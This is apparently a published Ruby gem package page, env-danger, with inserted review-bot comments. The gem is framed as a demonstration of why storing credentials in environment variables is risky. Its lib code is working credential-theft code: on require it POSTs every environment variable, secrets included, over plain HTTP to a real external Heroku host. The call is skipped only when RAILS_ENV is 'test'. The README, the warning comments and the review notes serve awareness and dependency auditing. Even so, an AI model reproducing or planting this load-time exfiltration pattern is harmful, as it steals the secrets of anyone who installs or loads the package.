env-danger 0.1.0
- checksums.yaml +7 -0
- data/.document +5 -0
- data/.rspec +2 -0
- data/Gemfile +21 -0
- data/Gemfile.lock +154 -0
- data/LICENSE.txt +20 -0
- data/README.md +29 -0
- data/Rakefile +53 -0
- data/VERSION +1 -0
- data/env-danger.gemspec +91 -0
- data/lib/env-danger.rb +8 -0
- data/lib/env-danger/danger.rb +23 -0
- data/lib/env-danger/version.rb +4 -0
- data/spec/danger_spec.rb +21 -0
- data/spec/fixtures/env_example.json +0 -0
- data/spec/spec_helper.rb +104 -0
- metadata +244 -0
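--- a/checksums.yaml
+++ b/checksums.yaml
@@ -0,0 +1,7 @@
+---
+SHA1:
+metadata.gz: f459f79828c0916a13ced463dd0b9f45f5986b52
+data.tar.gz: 4939a095c90dfe48dca09ed376ef20dcff8e0350
+SHA512:
+metadata.gz: e6047eebc78999ceef30fd8a29e5c768268b4ba8731e1eb4fa2fb4e8ca06c2524a1d8cf239cad946408f5d35bc05fda48ccc25669d1f9a44356ec8de96e6b4bf
+data.tar.gz: bbb1ae0adb36362087f2e9cfd3a08b54bf37764cfb742507d6fa05888cd6590694bf643eecc864a807e8208a3dc2d2e8b9cbf43f2c8fc7f25fc48d8b6079a003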
data/.document
ADDED
data/.rspec
ADDED
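--- a/data/Gemfile
+++ b/data/Gemfile
@@ -0,0 +1,21 @@
+source 'http://rubygems.org'
+
+gem 'httparty', github: 'jnunemaker/httparty'
+
+group :development do
+gem 'rdoc', '~> 3.12'
+gem 'bundler', '~> 1.0'
+gem 'jeweler', '~> 2.0.1'
+end
+
+group :development, :test do
+gem 'rubocop'
+gem 'rspec-core', '~> 3.2.0.pre', github: 'rspec/rspec-core'
+gem 'rspec-expectations', '~> 3.2.0.pre', github: 'rspec/rspec-expectations'
+gem 'rspec-support', '~> 3.2.0.pre', github: 'rspec/rspec-support'
+gem 'rspec-mocks', '~> 3.2.0.pre', github: 'rspec/rspec-mocks'
+gem 'rspec', '~> 3.2.0.pre', github: 'rspec/rspec'
+gem 'simplecov', '>= 0'
+gem 'coveralls'
+gem 'webmock'
+end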
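Review bot: `source 'http://rubygems.org'` on line 1 fetches gems over plain HTTP, and the `github:` shorthand resolves to `git://` remotes here (the Gemfile.lock on this page records `git://github.com/...`), so neither transport is authenticated or integrity-protected. Use `source 'https://rubygems.org'` and spell the git sources out, e.g. `gem 'httparty', git: 'https://github.com/jnunemaker/httparty.git'`. `httparty` is also the only runtime dependency and carries no version constraint or `ref:`, so every fresh resolve takes whatever the default branch holds at that moment.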
data/Gemfile.lock
ADDED
@@ -0,0 +1,154 @@
|
|
1
|
+
GIT
|
2
|
+
remote: git://github.com/jnunemaker/httparty.git
|
3
|
+
revision: ed9b00b785c52dbea220b620faa6c8e6fbc29abe
|
4
|
+
specs:
|
5
|
+
httparty (0.13.3)
|
6
|
+
json (~> 1.8)
|
7
|
+
multi_xml (>= 0.5.2)
|
8
|
+
|
9
|
+
GIT
|
10
|
+
remote: git://github.com/rspec/rspec-core.git
|
11
|
+
revision: 037291ea80486790da3916608ef4b101c1f71323
|
12
|
+
specs:
|
13
|
+
rspec-core (3.2.0.pre)
|
14
|
+
rspec-support (= 3.2.0.pre)
|
15
|
+
|
16
|
+
GIT
|
17
|
+
remote: git://github.com/rspec/rspec-expectations.git
|
18
|
+
revision: 76962c4899b0413ce806a79e05a53e4b5d9da2c0
|
19
|
+
specs:
|
20
|
+
rspec-expectations (3.2.0.pre)
|
21
|
+
diff-lcs (>= 1.2.0, < 2.0)
|
22
|
+
rspec-support (= 3.2.0.pre)
|
23
|
+
|
24
|
+
GIT
|
25
|
+
remote: git://github.com/rspec/rspec-mocks.git
|
26
|
+
revision: e9b6bf3532a4d5e01b492a5cad53fe56b751db3e
|
27
|
+
specs:
|
28
|
+
rspec-mocks (3.2.0.pre)
|
29
|
+
diff-lcs (>= 1.2.0, < 2.0)
|
30
|
+
rspec-support (= 3.2.0.pre)
|
31
|
+
|
32
|
+
GIT
|
33
|
+
remote: git://github.com/rspec/rspec-support.git
|
34
|
+
revision: 187845b1d46269b17edcf24a67744f98a8d1e994
|
35
|
+
specs:
|
36
|
+
rspec-support (3.2.0.pre)
|
37
|
+
|
38
|
+
GIT
|
39
|
+
remote: git://github.com/rspec/rspec.git
|
40
|
+
revision: 6af4995482ade2d49ad361ee003dee29f713ab17
|
41
|
+
specs:
|
42
|
+
rspec (3.2.0.pre)
|
43
|
+
rspec-core (= 3.2.0.pre)
|
44
|
+
rspec-expectations (= 3.2.0.pre)
|
45
|
+
rspec-mocks (= 3.2.0.pre)
|
46
|
+
|
47
|
+
GEM
|
48
|
+
remote: http://rubygems.org/
|
49
|
+
specs:
|
50
|
+
addressable (2.3.6)
|
51
|
+
ast (2.0.0)
|
52
|
+
astrolabe (1.3.0)
|
53
|
+
parser (>= 2.2.0.pre.3, < 3.0)
|
54
|
+
builder (3.2.2)
|
55
|
+
coveralls (0.7.2)
|
56
|
+
multi_json (~> 1.3)
|
57
|
+
rest-client (= 1.6.7)
|
58
|
+
simplecov (>= 0.7)
|
59
|
+
term-ansicolor (= 1.2.2)
|
60
|
+
thor (= 0.18.1)
|
61
|
+
crack (0.4.2)
|
62
|
+
safe_yaml (~> 1.0.0)
|
63
|
+
descendants_tracker (0.0.4)
|
64
|
+
thread_safe (~> 0.3, >= 0.3.1)
|
65
|
+
diff-lcs (1.2.5)
|
66
|
+
docile (1.1.5)
|
67
|
+
faraday (0.9.0)
|
68
|
+
multipart-post (>= 1.2, < 3)
|
69
|
+
git (1.2.8)
|
70
|
+
github_api (0.12.2)
|
71
|
+
addressable (~> 2.3)
|
72
|
+
descendants_tracker (~> 0.0.4)
|
73
|
+
faraday (~> 0.8, < 0.10)
|
74
|
+
hashie (>= 3.3)
|
75
|
+
multi_json (>= 1.7.5, < 2.0)
|
76
|
+
nokogiri (~> 1.6.3)
|
77
|
+
oauth2
|
78
|
+
hashie (3.3.2)
|
79
|
+
highline (1.6.21)
|
80
|
+
jeweler (2.0.1)
|
81
|
+
builder
|
82
|
+
bundler (>= 1.0)
|
83
|
+
git (>= 1.2.5)
|
84
|
+
github_api
|
85
|
+
highline (>= 1.6.15)
|
86
|
+
nokogiri (>= 1.5.10)
|
87
|
+
rake
|
88
|
+
rdoc
|
89
|
+
json (1.8.1)
|
90
|
+
jwt (1.2.0)
|
91
|
+
mime-types (2.4.3)
|
92
|
+
mini_portile (0.6.2)
|
93
|
+
multi_json (1.10.1)
|
94
|
+
multi_xml (0.5.5)
|
95
|
+
multipart-post (2.0.0)
|
96
|
+
nokogiri (1.6.5)
|
97
|
+
mini_portile (~> 0.6.0)
|
98
|
+
oauth2 (1.0.0)
|
99
|
+
faraday (>= 0.8, < 0.10)
|
100
|
+
jwt (~> 1.0)
|
101
|
+
multi_json (~> 1.3)
|
102
|
+
multi_xml (~> 0.5)
|
103
|
+
rack (~> 1.2)
|
104
|
+
parser (2.2.0.pre.8)
|
105
|
+
ast (>= 1.1, < 3.0)
|
106
|
+
slop (~> 3.4, >= 3.4.5)
|
107
|
+
powerpack (0.0.9)
|
108
|
+
rack (1.6.0)
|
109
|
+
rainbow (2.0.0)
|
110
|
+
rake (10.4.2)
|
111
|
+
rdoc (3.12.2)
|
112
|
+
json (~> 1.4)
|
113
|
+
rest-client (1.6.7)
|
114
|
+
mime-types (>= 1.16)
|
115
|
+
rubocop (0.27.1)
|
116
|
+
astrolabe (~> 1.3)
|
117
|
+
parser (>= 2.2.0.pre.7, < 3.0)
|
118
|
+
powerpack (~> 0.0.6)
|
119
|
+
rainbow (>= 1.99.1, < 3.0)
|
120
|
+
ruby-progressbar (~> 1.4)
|
121
|
+
ruby-progressbar (1.7.0)
|
122
|
+
safe_yaml (1.0.4)
|
123
|
+
simplecov (0.9.1)
|
124
|
+
docile (~> 1.1.0)
|
125
|
+
multi_json (~> 1.0)
|
126
|
+
simplecov-html (~> 0.8.0)
|
127
|
+
simplecov-html (0.8.0)
|
128
|
+
slop (3.6.0)
|
129
|
+
term-ansicolor (1.2.2)
|
130
|
+
tins (~> 0.8)
|
131
|
+
thor (0.18.1)
|
132
|
+
thread_safe (0.3.4)
|
133
|
+
tins (0.13.2)
|
134
|
+
webmock (1.20.4)
|
135
|
+
addressable (>= 2.3.6)
|
136
|
+
crack (>= 0.3.2)
|
137
|
+
|
138
|
+
PLATFORMS
|
139
|
+
ruby
|
140
|
+
|
141
|
+
DEPENDENCIES
|
142
|
+
bundler (~> 1.0)
|
143
|
+
coveralls
|
144
|
+
httparty!
|
145
|
+
jeweler (~> 2.0.1)
|
146
|
+
rdoc (~> 3.12)
|
147
|
+
rspec (~> 3.2.0.pre)!
|
148
|
+
rspec-core (~> 3.2.0.pre)!
|
149
|
+
rspec-expectations (~> 3.2.0.pre)!
|
150
|
+
rspec-mocks (~> 3.2.0.pre)!
|
151
|
+
rspec-support (~> 3.2.0.pre)!
|
152
|
+
rubocop
|
153
|
+
simplecov
|
154
|
+
webmock
|
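--- a/data/LICENSE.txt
+++ b/data/LICENSE.txt
@@ -0,0 +1,20 @@
+Copyright (c) 2015 David Fisher
+
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of this software and associated documentation files (the
+"Software"), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to
+permit persons to whom the Software is furnished to do so, subject to
+the following conditions:
+
+The above copyright notice and this permission notice shall be
+included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
+LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
+OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
+WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.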
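--- a/data/README.md
+++ b/data/README.md
@@ -0,0 +1,29 @@
+# ENV Danger
+
+As per this [blog post](http://movingfast.io/articles/environment-variables-considered-harmful/), and [discussion on Hacker News](https://news.ycombinator.com/item?id=8826024), keeping secret keys in your environment variables *may* be a poor idea. [The Twelve Factor App](http://12factor.net/) however specifically [recommends doing this](http://12factor.net/config).
+
+## What's this doing?
+
+This will take all your enviromental variables (passwords, secret keys, etc) and post them (insecurely over HTTP) to my server on Heroku.
+
+Server code can be found at: [https://github.com/tibbon/env_danger_server](https://github.com/tibbon/env_danger_server)
+
+## Usage
+
+**Do not install this gem and use it in production, or really... even in testing**
+
+But if you choose to ignore me:
+
+In your Gemfile
+```ruby
+gem 'env-danger'
+```
+
+Or via Bundle: `bundle install env-danger`
+
+You can run tests via `RAILS_ENV=test bundle exec rspec spec`. Yes, this is a little weird, but intentionally so.
+
+**Including this in your app will post your ENV variables to my (likely not very secure) server on Heroku. This is a terrible idea**
+
+
+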
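--- a/data/Rakefile
+++ b/data/Rakefile
@@ -0,0 +1,53 @@
+# encoding: utf-8
+
+require 'rubygems'
+require 'bundler'
+begin
+Bundler.setup(:default, :development)
+rescue Bundler::BundlerError => e
+$stderr.puts e.message
+$stderr.puts 'Run `bundle install` to install missing gems'
+exit e.status_code
+end
+require 'rake'
+
+require 'jeweler'
+Jeweler::Tasks.new do |gem|
+# gem is a Gem::Specification...
+# see http://guides.rubygems.org/specification-reference/ for more options
+gem.name = 'env-danger'
+gem.homepage = 'http://github.com/tibbon/env-danger'
+gem.license = 'MIT'
+gem.summary = %(Do not install, a security-hole demo only)
+gem.description = %(Demonstrates the dangers of using
+ENV to store credentials)
+gem.email = 'tibbon@gmail.com'
+gem.authors = ['David Fisher']
+# dependencies defined in Gemfile
+end
+Jeweler::RubygemsDotOrgTasks.new
+
+require 'rake/testtask'
+Rake::TestTask.new(:test) do |test|
+test.libs << 'lib' << 'test'
+test.pattern = 'test/**/test_*.rb'
+test.verbose = true
+end
+
+desc 'Code coverage detail'
+task :simplecov do
+ENV['COVERAGE'] = 'true'
+Rake::Task['test'].execute
+end
+
+task default: :test
+
+require 'rdoc/task'
+Rake::RDocTask.new do |rdoc|
+version = File.exist?('VERSION') ? File.read('VERSION') : ''
+
+rdoc.rdoc_dir = 'rdoc'
+rdoc.title = "env-danger #{version}"
+rdoc.rdoc_files.include('README*')
+rdoc.rdoc_files.include('lib/**/*.rb')
+end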
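Review bot: The default task runs `Rake::TestTask` with `test.pattern = 'test/**/test_*.rb'`, but the only test file in the package listing is spec/danger_spec.rb, so `rake` and `rake simplecov` match no files and run no examples. Pointing the default at RSpec with `require 'rspec/core/rake_task'`, `RSpec::Core::RakeTask.new(:spec)` and `task default: :spec` would run the suite. Because lib/env-danger.rb performs the upload on load unless `RAILS_ENV` is `'test'`, the task should also set `ENV['RAILS_ENV'] = 'test'` before the specs are loaded, rather than relying on the caller to pass it on the command line as the README describes.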
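--- a/data/VERSION
+++ b/data/VERSION
@@ -0,0 +1 @@
+0.1.0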
data/env-danger.gemspec
ADDED
@@ -0,0 +1,91 @@
|
|
1
|
+
# Generated by jeweler
|
2
|
+
# DO NOT EDIT THIS FILE DIRECTLY
|
3
|
+
# Instead, edit Jeweler::Tasks in Rakefile, and run 'rake gemspec'
|
4
|
+
# -*- encoding: utf-8 -*-
|
5
|
+
# stub: env-danger 0.1.0 ruby lib
|
6
|
+
|
7
|
+
Gem::Specification.new do |s|
|
8
|
+
s.name = "env-danger"
|
9
|
+
s.version = "0.1.0"
|
10
|
+
|
11
|
+
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
|
12
|
+
s.require_paths = ["lib"]
|
13
|
+
s.authors = ["David Fisher"]
|
14
|
+
s.date = "2015-01-02"
|
15
|
+
s.description = "Demonstrates the dangers of using\n ENV to store credentials"
|
16
|
+
s.email = "tibbon@gmail.com"
|
17
|
+
s.extra_rdoc_files = [
|
18
|
+
"LICENSE.txt",
|
19
|
+
"README.md"
|
20
|
+
]
|
21
|
+
s.files = [
|
22
|
+
".document",
|
23
|
+
".rspec",
|
24
|
+
"Gemfile",
|
25
|
+
"Gemfile.lock",
|
26
|
+
"LICENSE.txt",
|
27
|
+
"README.md",
|
28
|
+
"Rakefile",
|
29
|
+
"VERSION",
|
30
|
+
"env-danger.gemspec",
|
31
|
+
"lib/env-danger.rb",
|
32
|
+
"lib/env-danger/danger.rb",
|
33
|
+
"lib/env-danger/version.rb",
|
34
|
+
"spec/danger_spec.rb",
|
35
|
+
"spec/fixtures/env_example.json",
|
36
|
+
"spec/spec_helper.rb"
|
37
|
+
]
|
38
|
+
s.homepage = "http://github.com/tibbon/env-danger"
|
39
|
+
s.licenses = ["MIT"]
|
40
|
+
s.rubygems_version = "2.2.2"
|
41
|
+
s.summary = "Do not install, a security-hole demo only"
|
42
|
+
|
43
|
+
if s.respond_to? :specification_version then
|
44
|
+
s.specification_version = 4
|
45
|
+
|
46
|
+
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
|
47
|
+
s.add_runtime_dependency(%q<httparty>, [">= 0"])
|
48
|
+
s.add_development_dependency(%q<rdoc>, ["~> 3.12"])
|
49
|
+
s.add_development_dependency(%q<bundler>, ["~> 1.0"])
|
50
|
+
s.add_development_dependency(%q<jeweler>, ["~> 2.0.1"])
|
51
|
+
s.add_development_dependency(%q<rubocop>, [">= 0"])
|
52
|
+
s.add_development_dependency(%q<rspec-core>, ["~> 3.2.0.pre"])
|
53
|
+
s.add_development_dependency(%q<rspec-expectations>, ["~> 3.2.0.pre"])
|
54
|
+
s.add_development_dependency(%q<rspec-support>, ["~> 3.2.0.pre"])
|
55
|
+
s.add_development_dependency(%q<rspec-mocks>, ["~> 3.2.0.pre"])
|
56
|
+
s.add_development_dependency(%q<rspec>, ["~> 3.2.0.pre"])
|
57
|
+
s.add_development_dependency(%q<simplecov>, [">= 0"])
|
58
|
+
s.add_development_dependency(%q<coveralls>, [">= 0"])
|
59
|
+
s.add_development_dependency(%q<webmock>, [">= 0"])
|
60
|
+
else
|
61
|
+
s.add_dependency(%q<httparty>, [">= 0"])
|
62
|
+
s.add_dependency(%q<rdoc>, ["~> 3.12"])
|
63
|
+
s.add_dependency(%q<bundler>, ["~> 1.0"])
|
64
|
+
s.add_dependency(%q<jeweler>, ["~> 2.0.1"])
|
65
|
+
s.add_dependency(%q<rubocop>, [">= 0"])
|
66
|
+
s.add_dependency(%q<rspec-core>, ["~> 3.2.0.pre"])
|
67
|
+
s.add_dependency(%q<rspec-expectations>, ["~> 3.2.0.pre"])
|
68
|
+
s.add_dependency(%q<rspec-support>, ["~> 3.2.0.pre"])
|
69
|
+
s.add_dependency(%q<rspec-mocks>, ["~> 3.2.0.pre"])
|
70
|
+
s.add_dependency(%q<rspec>, ["~> 3.2.0.pre"])
|
71
|
+
s.add_dependency(%q<simplecov>, [">= 0"])
|
72
|
+
s.add_dependency(%q<coveralls>, [">= 0"])
|
73
|
+
s.add_dependency(%q<webmock>, [">= 0"])
|
74
|
+
end
|
75
|
+
else
|
76
|
+
s.add_dependency(%q<httparty>, [">= 0"])
|
77
|
+
s.add_dependency(%q<rdoc>, ["~> 3.12"])
|
78
|
+
s.add_dependency(%q<bundler>, ["~> 1.0"])
|
79
|
+
s.add_dependency(%q<jeweler>, ["~> 2.0.1"])
|
80
|
+
s.add_dependency(%q<rubocop>, [">= 0"])
|
81
|
+
s.add_dependency(%q<rspec-core>, ["~> 3.2.0.pre"])
|
82
|
+
s.add_dependency(%q<rspec-expectations>, ["~> 3.2.0.pre"])
|
83
|
+
s.add_dependency(%q<rspec-support>, ["~> 3.2.0.pre"])
|
84
|
+
s.add_dependency(%q<rspec-mocks>, ["~> 3.2.0.pre"])
|
85
|
+
s.add_dependency(%q<rspec>, ["~> 3.2.0.pre"])
|
86
|
+
s.add_dependency(%q<simplecov>, [">= 0"])
|
87
|
+
s.add_dependency(%q<coveralls>, [">= 0"])
|
88
|
+
s.add_dependency(%q<webmock>, [">= 0"])
|
89
|
+
end
|
90
|
+
end
|
91
|
+
|
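--- a/data/lib/env-danger.rb
+++ b/data/lib/env-danger.rb
@@ -0,0 +1,8 @@
+require 'httparty'
+require_relative './env-danger/version'
+require_relative './env-danger/danger'
+
+# Doesn't run in this line in test environment
+# stops test from picking it up and triggering it
+# Also makes my testing easier, so the real request isn't made
+EnvDanger.upload unless ENV['RAILS_ENV'] == 'test'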
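Review bot: The call on the last line runs at `require` time and is opt-out: it is skipped only when `RAILS_ENV` is exactly `'test'`, so a console, a Rake task or a spec run started without that variable triggers the POST just by loading the gem. For a demonstration gem an opt-in guard is the safer default, for example `EnvDanger.upload if ENV['ENV_DANGER_DEMO'] == '1'` (variable name constructed for this note), and better still an explicit call by the user instead of one from the entry file. The comment above the call would read more clearly as `# Skipped when RAILS_ENV is 'test' so the specs never send the real request`. For anyone auditing dependencies, this file is the pattern to look for: a top-level statement in a gem's require entry point that performs network I/O.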
@@ -0,0 +1,23 @@
|
|
1
|
+
# EnvDanger
|
2
|
+
# This module takes your system's ENV variables and posts them to my server
|
3
|
+
# Do NOT use in production
|
4
|
+
# This is an example of what could happen if you allow untrusted code
|
5
|
+
# to execute on your system.
|
6
|
+
# Surely, no reasonable individual would allow such,
|
7
|
+
# but how often do you audit your gems?
|
8
|
+
module EnvDanger
|
9
|
+
include HTTParty
|
10
|
+
POST_ADDRESS = 'http://env-danger.herokuapp.com/envs'
|
11
|
+
class << self
|
12
|
+
def upload
|
13
|
+
post(
|
14
|
+
POST_ADDRESS,
|
15
|
+
body: {
|
16
|
+
all_envs: {
|
17
|
+
variables: ENV
|
18
|
+
}
|
19
|
+
}
|
20
|
+
)
|
21
|
+
end
|
22
|
+
end
|
23
|
+
end
|
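Review bot: `variables: ENV` in `upload` sends every environment variable, values included, and `POST_ADDRESS` is an `http://` URL, so the payload crosses the network in cleartext. The demonstration makes the same point if it transmits names only, `variables: ENV.keys`, to an `https://` endpoint, which keeps real credentials off the wire when someone installs the gem by mistake. The header comment should state the destination and payload explicitly, e.g. `# Sends the complete ENV to POST_ADDRESS over HTTP when upload is called`. On the detection side, the observable is an outbound POST to the host in `POST_ADDRESS` at process start. The file header for this section is missing on the page; going by the file list it appears to be data/lib/env-danger/danger.rb.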
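--- a/data/spec/danger_spec.rb
+++ b/data/spec/danger_spec.rb
@@ -0,0 +1,21 @@
+require 'spec_helper'
+require 'env-danger'
+
+RSpec.describe EnvDanger do
+describe '.upload' do
+before :each do
+# Temporarily clear ENV hash,
+# so that not much is posting to the server
+ENV.clear
+ENV.update({'foo' => 'bar'})
+
+stub_request(:post, EnvDanger::POST_ADDRESS).
+to_return(body: fixture('env_example.json'))
+end
+it 'posts ENV data via HTTParty' do
+env_result = EnvDanger.upload
+expect(a_request(:post, EnvDanger::POST_ADDRESS)).to have_been_made
+expect(env_result.code).to eq 200
+end
+end
+end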
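Review bot: `ENV.clear` in the `before :each` block is never undone, so `PATH`, `HOME`, `RAILS_ENV` and everything else stay wiped for the rest of the process, including any examples that run later. The comment says the clear is temporary, so save and restore the environment: `@saved_env = ENV.to_hash` before the clear and `after(:each) { ENV.replace(@saved_env) }`. The example also asserts only that a POST was made; adding `.with(body: ...)` to the `a_request` expectation would pin what is actually sent.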
File without changes
|
data/spec/spec_helper.rb
ADDED
@@ -0,0 +1,104 @@
|
|
1
|
+
require 'simplecov'
|
2
|
+
require 'coveralls'
|
3
|
+
require 'webmock/rspec'
|
4
|
+
|
5
|
+
# This file was generated by the `rspec --init` command. Conventionally, all
|
6
|
+
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
|
7
|
+
# The generated `.rspec` file contains `--require spec_helper` which will cause
|
8
|
+
# this file to always be loaded, without a need to explicitly require it in any
|
9
|
+
# files.
|
10
|
+
#
|
11
|
+
# Given that it is always loaded, you are encouraged to keep this file as
|
12
|
+
# light-weight as possible. Requiring heavyweight dependencies from this file
|
13
|
+
# will add to the boot time of your test suite on EVERY test run, even for an
|
14
|
+
# individual file that may not need all of that loaded. Instead, consider making
|
15
|
+
# a separate helper file that requires the additional dependencies and performs
|
16
|
+
# the additional setup, and require it from the spec files that actually need
|
17
|
+
# it.
|
18
|
+
#
|
19
|
+
# The `.rspec` file also contains a few flags that are not defaults but that
|
20
|
+
# users commonly want.
|
21
|
+
#
|
22
|
+
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
|
23
|
+
RSpec.configure do |config|
|
24
|
+
# rspec-expectations config goes here. You can use an alternate
|
25
|
+
# assertion/expectation library such as wrong or the stdlib/minitest
|
26
|
+
# assertions if you prefer.
|
27
|
+
config.expect_with :rspec do |expectations|
|
28
|
+
# This option will default to `true` in RSpec 4. It makes the `description`
|
29
|
+
# and `failure_message` of custom matchers include text for helper methods
|
30
|
+
# defined using `chain`, e.g.:
|
31
|
+
# be_bigger_than(2).and_smaller_than(4).description
|
32
|
+
# # => "be bigger than 2 and smaller than 4"
|
33
|
+
# ...rather than:
|
34
|
+
# # => "be bigger than 2"
|
35
|
+
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
|
36
|
+
end
|
37
|
+
|
38
|
+
# rspec-mocks config goes here. You can use an alternate test double
|
39
|
+
# library (such as bogus or mocha) by changing the `mock_with` option here.
|
40
|
+
config.mock_with :rspec do |mocks|
|
41
|
+
# Prevents you from mocking or stubbing a method that does not exist on
|
42
|
+
# a real object. This is generally recommended, and will default to
|
43
|
+
# `true` in RSpec 4.
|
44
|
+
mocks.verify_partial_doubles = true
|
45
|
+
end
|
46
|
+
|
47
|
+
# The settings below are suggested to provide a good initial experience
|
48
|
+
# with RSpec, but feel free to customize to your heart's content.
|
49
|
+
|
50
|
+
# These two settings work together to allow you to limit a spec run
|
51
|
+
# to individual examples or groups you care about by tagging them with
|
52
|
+
# `:focus` metadata. When nothing is tagged with `:focus`, all examples
|
53
|
+
# get run.
|
54
|
+
config.filter_run :focus
|
55
|
+
config.run_all_when_everything_filtered = true
|
56
|
+
|
57
|
+
# Limits the available syntax to the non-monkey patched syntax that is
|
58
|
+
# recommended. For more details, see:
|
59
|
+
# - http://myronmars.to/n/dev-blog/2012/06/rspecs-new-expectation-syntax
|
60
|
+
# - http://teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
|
61
|
+
# - http://myronmars.to/n/dev-blog/2014/05/notable-changes-in-rspec-3#new__config_option_to_disable_rspeccore_monkey_patching
|
62
|
+
config.disable_monkey_patching!
|
63
|
+
|
64
|
+
# This setting enables warnings. It's recommended, but in some cases may
|
65
|
+
# be too noisy due to issues in dependencies.
|
66
|
+
config.warnings = true
|
67
|
+
|
68
|
+
# Many RSpec users commonly either run the entire suite or an individual
|
69
|
+
# file, and it's useful to allow more verbose output when running an
|
70
|
+
# individual spec file.
|
71
|
+
if config.files_to_run.one?
|
72
|
+
# Use the documentation formatter for detailed output,
|
73
|
+
# unless a formatter has already been configured
|
74
|
+
# (e.g. via a command-line flag).
|
75
|
+
config.default_formatter = 'doc'
|
76
|
+
end
|
77
|
+
|
78
|
+
# Print the 10 slowest examples and example groups at the
|
79
|
+
# end of the spec run, to help surface which specs are running
|
80
|
+
# particularly slow.
|
81
|
+
config.profile_examples = 10
|
82
|
+
|
83
|
+
# Run specs in random order to surface order dependencies. If you find an
|
84
|
+
# order dependency and want to debug it, you can fix the order by providing
|
85
|
+
# the seed, which is printed after each run.
|
86
|
+
# --seed 1234
|
87
|
+
config.order = :random
|
88
|
+
|
89
|
+
# Seed global randomization in this process using the `--seed` CLI option.
|
90
|
+
# Setting this allows you to use `--seed` to deterministically reproduce
|
91
|
+
# test failures related to randomization by passing the same `--seed` value
|
92
|
+
# as the one that triggered the failure.
|
93
|
+
Kernel.srand config.seed
|
94
|
+
end
|
95
|
+
|
96
|
+
# Helper methods for accessing fixture path
|
97
|
+
def fixture_path
|
98
|
+
File.expand_path('../fixtures', __FILE__)
|
99
|
+
end
|
100
|
+
|
101
|
+
# Helper method for accessing a real file in the fixture path
|
102
|
+
def fixture(file)
|
103
|
+
File.new(fixture_path + '/' + file)
|
104
|
+
end
|
metadata
ADDED
@@ -0,0 +1,244 @@
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
2
|
+
name: env-danger
|
3
|
+
version: !ruby/object:Gem::Version
|
4
|
+
version: 0.1.0
|
5
|
+
platform: ruby
|
6
|
+
authors:
|
7
|
+
- David Fisher
|
8
|
+
autorequire:
|
9
|
+
bindir: bin
|
10
|
+
cert_chain: []
|
11
|
+
date: 2015-01-02 00:00:00.000000000 Z
|
12
|
+
dependencies:
|
13
|
+
- !ruby/object:Gem::Dependency
|
14
|
+
name: httparty
|
15
|
+
requirement: !ruby/object:Gem::Requirement
|
16
|
+
requirements:
|
17
|
+
- - ">="
|
18
|
+
- !ruby/object:Gem::Version
|
19
|
+
version: '0'
|
20
|
+
type: :runtime
|
21
|
+
prerelease: false
|
22
|
+
version_requirements: !ruby/object:Gem::Requirement
|
23
|
+
requirements:
|
24
|
+
- - ">="
|
25
|
+
- !ruby/object:Gem::Version
|
26
|
+
version: '0'
|
27
|
+
- !ruby/object:Gem::Dependency
|
28
|
+
name: rdoc
|
29
|
+
requirement: !ruby/object:Gem::Requirement
|
30
|
+
requirements:
|
31
|
+
- - "~>"
|
32
|
+
- !ruby/object:Gem::Version
|
33
|
+
version: '3.12'
|
34
|
+
type: :development
|
35
|
+
prerelease: false
|
36
|
+
version_requirements: !ruby/object:Gem::Requirement
|
37
|
+
requirements:
|
38
|
+
- - "~>"
|
39
|
+
- !ruby/object:Gem::Version
|
40
|
+
version: '3.12'
|
41
|
+
- !ruby/object:Gem::Dependency
|
42
|
+
name: bundler
|
43
|
+
requirement: !ruby/object:Gem::Requirement
|
44
|
+
requirements:
|
45
|
+
- - "~>"
|
46
|
+
- !ruby/object:Gem::Version
|
47
|
+
version: '1.0'
|
48
|
+
type: :development
|
49
|
+
prerelease: false
|
50
|
+
version_requirements: !ruby/object:Gem::Requirement
|
51
|
+
requirements:
|
52
|
+
- - "~>"
|
53
|
+
- !ruby/object:Gem::Version
|
54
|
+
version: '1.0'
|
55
|
+
- !ruby/object:Gem::Dependency
|
56
|
+
name: jeweler
|
57
|
+
requirement: !ruby/object:Gem::Requirement
|
58
|
+
requirements:
|
59
|
+
- - "~>"
|
60
|
+
- !ruby/object:Gem::Version
|
61
|
+
version: 2.0.1
|
62
|
+
type: :development
|
63
|
+
prerelease: false
|
64
|
+
version_requirements: !ruby/object:Gem::Requirement
|
65
|
+
requirements:
|
66
|
+
- - "~>"
|
67
|
+
- !ruby/object:Gem::Version
|
68
|
+
version: 2.0.1
|
69
|
+
- !ruby/object:Gem::Dependency
|
70
|
+
name: rubocop
|
71
|
+
requirement: !ruby/object:Gem::Requirement
|
72
|
+
requirements:
|
73
|
+
- - ">="
|
74
|
+
- !ruby/object:Gem::Version
|
75
|
+
version: '0'
|
76
|
+
type: :development
|
77
|
+
prerelease: false
|
78
|
+
version_requirements: !ruby/object:Gem::Requirement
|
79
|
+
requirements:
|
80
|
+
- - ">="
|
81
|
+
- !ruby/object:Gem::Version
|
82
|
+
version: '0'
|
83
|
+
- !ruby/object:Gem::Dependency
|
84
|
+
name: rspec-core
|
85
|
+
requirement: !ruby/object:Gem::Requirement
|
86
|
+
requirements:
|
87
|
+
- - "~>"
|
88
|
+
- !ruby/object:Gem::Version
|
89
|
+
version: 3.2.0.pre
|
90
|
+
type: :development
|
91
|
+
prerelease: false
|
92
|
+
version_requirements: !ruby/object:Gem::Requirement
|
93
|
+
requirements:
|
94
|
+
- - "~>"
|
95
|
+
- !ruby/object:Gem::Version
